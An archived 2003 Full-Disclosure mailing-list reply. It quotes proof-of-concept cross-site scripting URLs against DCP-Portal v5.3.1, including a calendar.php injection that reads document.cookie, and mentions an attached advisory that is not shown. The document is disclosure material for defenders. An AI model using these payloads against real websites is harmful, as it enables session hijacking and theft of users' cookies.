[Full-Disclosure] Re: Some XSS vulns

From: mcbethhat_private
Date: Wed Mar 19 2003 - 10:01:25 PST

    On Wed, 19 Mar 2003 01:59:35 +0200
    Ertan Kurt <ertankat_private> wrote:
    
    > DCP-Portal v5.3.1
    > http://target/search.php?fields=content&q=></script>
    > http://target/calendar.php?year=>alert(document.cookie);</script>&month=03&day=05
    > Vendor Site: http://www.dcp-portal.org
    
    I've found many more vulnerabilities in dcp-portal... look at attached
    advisory.
    
    
    Regards
    Grzegorz Aksamit
    
    ----------------------------------------------------------
     ( signature censored )
    ---------------------------------[ grzegorz aksamit ]-----

    _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html



    This archive was generated by hypermail 2b30 : Wed Mar 19 2003 - 10:27:49 PST